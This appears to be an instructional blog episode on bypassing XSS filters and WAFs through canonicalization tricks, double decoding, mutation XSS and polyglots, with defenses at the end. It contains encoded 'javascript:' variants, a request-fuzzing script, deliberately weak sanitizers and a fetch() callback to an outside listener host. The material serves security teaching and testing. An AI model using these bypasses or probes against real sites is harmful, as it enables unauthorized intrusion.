By Episode 3, we were tracing tainted data through modern frontend code like a bloodhound: source, transform, sink, execution. But real targets rarely hand you a clean innerHTML sink with zero defenses. They give you “sanitization,” regex filters, brittle blacklist logic, WAF signatures, markdown renderers, HTML rewriters, and browser parsers that do not agree with the developer’s mental model. That gap between what defenders think they blocked and what the browser actually does is where filter evasion lives.
This episode is about exploiting that gap safely and systematically. We’ll look at how naive sanitizers fail, why parser differentials matter, how mutation XSS turns “sanitized” markup back into active code, how polyglot payloads survive uncertainty, and how to reason about WAF bypasses without devolving into payload cargo culting. The goal is not memorizing a zoo of strings. It’s learning how to generate bypasses from first principles.
Why filters fail: the browser is not a regex engine
Most broken XSS defenses fail for one of four reasons:
They sanitize the wrong context
- HTML escaping used for JavaScript
- URL validation used for HTML attributes
- Server-side filtering applied before client-side decoding
They normalize incompletely
- Single decoding pass
- Case-sensitive checks
- Failure to canonicalize whitespace, entities, or Unicode forms
They misunderstand parser behavior
- HTML parser repairs malformed markup
- Attribute parsing is more permissive than expected
- Browser mutation rewrites DOM in dangerous ways
They rely on blacklists
- Block
<script>but allow event handlers - Block
onerrorbut allowsrcdoc - Block
javascript:literally but miss encoded or transformed variants
- Block
A typical anti-pattern looks like this:
function weakSanitize(input) {
return input
.replace(/<script.*?>.*?<\/script>/gi, '')
.replace(/onerror/gi, '')
.replace(/onload/gi, '');
}
element.innerHTML = weakSanitize(userInput);
This filter assumes:
- script tags are the only execution path
- event handlers are known and enumerable
- the payload arrives in one stable textual form
- the browser won’t reinterpret malformed HTML
All of those assumptions are false.
Build a bypass workflow, not a payload list
As we saw in earlier episodes, context is everything. For evasion, add a second model:
input form → app transforms → filter/WAF transforms → browser parse → DOM mutation → execution
When facing a filter, answer these questions in order:
1. What exactly is being filtered?
Compare:
- raw request
- reflected response
- live DOM after parsing
- DOM after client-side rewrites
Use Burp Repeater and browser DevTools together. For example:
curl -i 'https://target.example/search?q=%3Csvg%20onload%3Dconsole.log(1)%3E'
Then inspect:
- whether the server rewrites case
- whether entities are decoded once or twice
- whether the browser inserts quotes, closes tags, or moves nodes
2. Is the filter pre-parse or post-parse?
A server-side regex sees bytes. The browser sees tokens and nodes. If the filter strips <script> but allows malformed HTML that the browser repairs into executable DOM, you may have a parser differential.
3. Is there a decode or transform step after filtering?
Classic red flags:
- URL decoding after validation
- HTML entity decoding in a template helper
- markdown rendering after “safe text” checks
- client-side
decodeURIComponent()before assignment toinnerHTML
4. Can you switch execution primitives?
If <script> is blocked:
- event handlers
- SVG/MathML behaviors
iframe srcdoc- dangerous URL schemes where allowed
- DOM clobbering into existing code paths
- mutation-based reactivation
The right bypass is usually not “more obfuscation.” It’s “a different sink primitive.”
Canonicalization attacks: beat the filter’s view of the world
Canonicalization is the process of reducing multiple equivalent encodings to a single normalized form. Filters that inspect non-canonical input are fragile.
Mixed encoding and decoding mismatches
Suppose the application blocks javascript: in href values:
if (input.toLowerCase().includes('javascript:')) reject();
But later it decodes entities or percent-encoding before rendering. Then variants may survive validation and become active later.
Educational examples of transformations to test:
javascript:
javascript:
java%73cript:
javascript:
The point is not that every modern browser will execute every variant in every context. The point is to test whether:
- the filter inspects one representation
- a later stage transforms it into another
- the browser consumes the transformed version
Whitespace and control character confusion
Weak filters often look for exact substrings like onerror= or javascript:. Browser tokenization may tolerate surprising separators or normalization.
Probe for:
- tabs
- newlines
- carriage returns
- form feeds
- multiple spaces
- mixed case
Example fuzzing idea:
# educational fuzz helper
tokens = ["onload", "onerror", "javascript:"]
separators = [" ", "\t", "\n", "\r", "\f"]
for token in tokens:
for sep in separators:
print(token.replace("a", "a" + sep))
Again, the value is not a magic string. It’s observing whether the target canonicalizes before checking.
Double decoding bugs
A common anti-pattern:
const input = req.query.q; // %253Csvg...%253E
if (input.includes('<')) reject(); // sees no literal <
const decoded = decodeURIComponent(input);
element.innerHTML = decoded;
Test for this with staged encoding. If one decode happens server-side and another client-side, payloads can emerge only at the sink.
Parser confusion: the browser repairs your exploit for you
HTML parsers are designed to recover from broken markup. Filters are often designed as if malformed input just stays malformed.
Attribute breakout via quote assumptions
If a filter only escapes double quotes but not single quotes, backticks, or unquoted attribute edge cases, you may still break context depending on how the template is built.
Example vulnerable template:
<div data-name='USER_INPUT'></div>
Weak defense:
input = input.replace(/"/g, '"');
That does nothing for single-quoted context.
A safe way to test behavior without immediate execution is to inject benign markers and inspect the repaired DOM:
' data-probe='x
Then see whether a new attribute appears in DevTools. Once you confirm breakout, you can move to an execution primitive appropriate for that context.
Tag balancing and browser auto-closing
Applications often strip > or specific tags but leave enough structure for the parser to reconstruct dangerous markup.
For example, if a markdown or HTML filter allows fragments like this through:
<svg
and later concatenation or parser repair completes the node, you may get executable elements despite incomplete original input.
Foreign content: SVG and MathML
Some sanitizers focus on HTML tags and forget that browsers parse SVG and MathML with their own rules. Historically, this has been fertile ground for bypasses and mutation XSS.
Even when direct script execution is blocked, foreign-content parsing can:
- create unexpected namespaces
- preserve attributes differently
- mutate when inserted into the DOM
- interact badly with sanitizers that serialize and reparse markup
Mutation XSS: sanitized now, dangerous later
Mutation XSS, or mXSS, happens when markup is sanitized into a form that appears inert, but browser parsing or DOM mutation transforms it into executable markup later.
This matters because many sanitizers work like this:
- parse untrusted HTML
- remove dangerous nodes/attributes
- serialize back to a string
- assign that string to
innerHTMLsomewhere else
That final reparse can change semantics.
Why mXSS happens
Different stages may use:
- different parsers
- different namespaces
- different serialization rules
- different DOM repair logic
A sanitizer may inspect one DOM tree, but the browser eventually executes another.
Practical testing pattern
When you suspect mXSS:
- Put the candidate payload through the application normally.
- Capture the stored/rendered HTML.
- Reinsert that exact output into a local test harness.
- Compare:
- original input
- sanitizer output
- final DOM after browser parse
Minimal harness:
<!doctype html>
<html>
<body>
<div id="app"></div>
<script>
const sanitizedOutput = `PASTE_OUTPUT_HERE`;
document.getElementById('app').innerHTML = sanitizedOutput;
console.log(document.getElementById('app').innerHTML);
</script>
</body>
</html>
If the browser mutates the markup into something more dangerous than the sanitizer intended, you’ve got a strong lead.
What to look for
Look for:
- attribute reordering or quote insertion
- namespace changes in SVG/MathML
- unexpected node creation
- repaired malformed tags
- text becoming markup after decode/reparse chains
Modern hardened sanitizers have reduced many historical mXSS cases, but bespoke sanitizers and legacy libraries still fail here.
Polyglots: payloads for uncertain contexts
Polyglot payloads are designed to remain syntactically meaningful across multiple parsing contexts. They’re useful when:
- the exact sink is unclear
- your input may land in HTML, attribute, JS string, or URL contexts depending on route or template branch
- you need a discovery probe that survives transformations
A polyglot is not a universal instant-win string. It’s a reconnaissance tool and sometimes a bypass aid.
What makes a good polyglot
A useful polyglot:
- breaks out of multiple likely contexts
- degrades gracefully if one context fails
- includes a low-noise execution or callback primitive
- is short enough to survive truncation and storage quirks
Example strategy, not magic
Instead of memorizing one famous payload, think in layers:
- close current context if possible
- open a new executable context
- leave trailing characters harmless
For example, if your input might appear in:
- HTML text
- quoted attribute
- script string
you want a prefix that can terminate at least some of those contexts, then fall into a new tag or handler.
A safe discovery-oriented approach is to use a callback marker rather than alert():
fetch('https://listener.example/xss?probe=polyglot4')
Then embed that callback in a context-appropriate primitive after you learn where breakout occurs.
Polyglots and WAFs
Polyglots often trigger signatures because they contain many suspicious delimiters. On hardened targets, a smaller context-specific bypass usually beats a giant “works everywhere” string.
Use polyglots to map uncertainty. Use precision payloads to land the exploit.
WAF bypass tactics: think like a normalizer
WAFs usually inspect HTTP requests, not final browser DOM. That means they lose whenever:
- dangerous semantics emerge only after app-side transforms
- the payload is split across parameters or requests
- the browser repairs malformed input into executable markup
- client-side code assembles the final sink value
Common WAF blind spots
Parameter fragmentation
If a frontend concatenates multiple values into one sink, but the WAF inspects parameters independently, execution can emerge only after assembly.
Example pattern:
const html = part1 + part2 + part3;
target.innerHTML = html;
You may see this in template fragments, markdown options, or widget configs.
JSON and nested structures
WAF rules tuned for URL parameters often miss payloads hidden in:
- JSON bodies
- arrays
- nested object fields
- GraphQL variables
Use realistic content types:
curl -i https://target.example/api/profile \
-H 'Content-Type: application/json' \
--data '{"bio":"<probe>"}'
Then observe how that field is rendered later.
Alternate request paths
A WAF may protect the main web app but not:
- API subdomains
- upload processors
- preview endpoints
- websocket/bootstrap APIs
- mobile-specific endpoints
The XSS sink is often downstream from the protected edge.
Signature evasion versus semantic evasion
There are two very different ways to bypass a WAF:
Signature evasion
- alter bytes so the WAF misses a known pattern
- case changes, encoding, fragmentation
Semantic evasion
- use a different browser feature than the WAF expects
- no
<script>, no obvious handler, no literal dangerous scheme
Semantic evasion is usually more reliable because it survives normalization. If the WAF blocks <script>, don’t spend all day trying to smuggle <script>. Ask what other executable semantics the browser accepts in that sink.
Differential analysis: app, WAF, browser
The cleanest way to study bypasses is differential testing.
Step 1: establish a baseline probe set
Use harmless probes first:
xsstest123
"><xsstest>
' data-probe='1
<svg
javascript:
Step 2: compare responses through different paths
- direct app response
- response behind CDN/WAF
- mobile/API path
- stored render path
- live DOM after framework hydration
Step 3: automate mutations
A tiny mutation harness can save hours:
import itertools
import requests
base = "https://target.example/search"
parts = ["<svg", "<img", "onload", "onerror", "srcdoc", "javascript:"]
encoders = [
lambda s: s,
lambda s: s.upper(),
lambda s: s.replace("a", "a"),
]
for p, e in itertools.product(parts, encoders):
candidate = e(p)
r = requests.get(base, params={"q": candidate}, timeout=10)
print(candidate, r.status_code, len(r.text))
This won’t “find XSS” by itself. It highlights normalization differences, blocking thresholds, and weird reflections worth manual follow-up.
Real-world anti-patterns worth hunting
Weak markdown sanitization
Pipeline:
- user markdown
- markdown renderer
- HTML allowlist
- final
innerHTML
Problems:
- raw HTML partially allowed
- links/images insufficiently validated
- post-render rewrites introduce dangerous attributes
- code fences or embedded HTML mutate on reparse
“Strip tags” then trust output
Classic bug:
input = input.replace(/<[^>]+>/g, '');
This is not sanitization. It can be bypassed by malformed markup, entity tricks, parser repair, and anything that becomes markup later through decoding or concatenation.
Client-side sanitization only
If the server stores raw input and the browser sanitizes on render, any alternate render path, legacy client, or admin tool may become exploitable.
Homegrown allowlists
Developers allow “safe tags” but forget:
- dangerous attributes
- namespace-specific behavior
- URL-valued attributes
srcdoc- custom elements interacting with framework code
- DOM clobbering side effects
Defenses that actually hold up
Evasion exists because defenses are often ad hoc. The answer is not a bigger blacklist.
1. Eliminate dangerous sinks where possible
Prefer:
textContentinnerText- safe attribute setters for known-safe attributes
- framework auto-escaping paths
Avoid raw HTML insertion unless absolutely necessary.
2. Use context-correct output encoding
Encode for the exact sink:
- HTML text
- HTML attribute
- JavaScript string
- CSS
- URL
One encoder does not fit all contexts.
3. Sanitize with a mature HTML sanitizer
Use a well-maintained sanitizer with:
- secure defaults
- namespace-aware parsing
- active patching for mXSS and browser quirks
Then keep it updated. Old sanitizer versions are frequent bypass targets.
4. Normalize before validation
If you must validate structured input:
- decode once in a controlled place
- normalize case and Unicode where relevant
- reject ambiguous forms
- avoid multi-stage decode pipelines
5. Enforce browser-side mitigations
We’ll go deep on these next episode’s successor, but the high-level stack is:
- strong CSP
- Trusted Types
- safe templating
- no inline event handlers
- no string-to-code APIs
These controls don’t replace sanitization, but they dramatically reduce exploitability when sanitization fails.
6. Test sanitizers against browser reality
Unit-test with:
- hostile HTML samples
- serialization/reparse cycles
- SVG/MathML cases
- framework hydration paths
- stored and reflected render paths
If your sanitizer only passes string-based tests and never browser DOM tests, you’re flying blind.
A practical lab mindset
When you hit a filtered target, don’t ask, “What payload bypasses this WAF?”
Ask:
- What representation does the filter inspect?
- What transformations happen after inspection?
- What parser will ultimately interpret the data?
- Can I shift to a different execution primitive?
- Can browser mutation reactivate something the sanitizer thought was inert?
That mindset scales far better than memorizing 500 payloads from a gist.
A good engagement notebook for this episode’s techniques should track:
Input sent:
Observed server reflection:
Observed DOM after parse:
Observed DOM after client rewrite:
Blocked by WAF?:
Normalized/decoded?:
Potential alternate primitive:
Stored path differs?:
That structure turns “try random payloads” into disciplined exploit development.
Closing thoughts
Filter evasion is not wizardry. It’s just exploiting mismatches: between bytes and tokens, strings and DOM nodes, validation and canonicalization, sanitizer output and browser mutation, WAF signatures and actual execution semantics. The strongest attackers are not the ones with the biggest payload list. They’re the ones who can explain exactly why a bypass works.
In the next episode, we’ll assume you’ve landed code execution and move to what matters most in a real assessment: impact. We’ll chain XSS into account takeover, privileged action abuse, token theft, and sensitive data exfiltration—the difference between “it pops” and “this is business-critical.”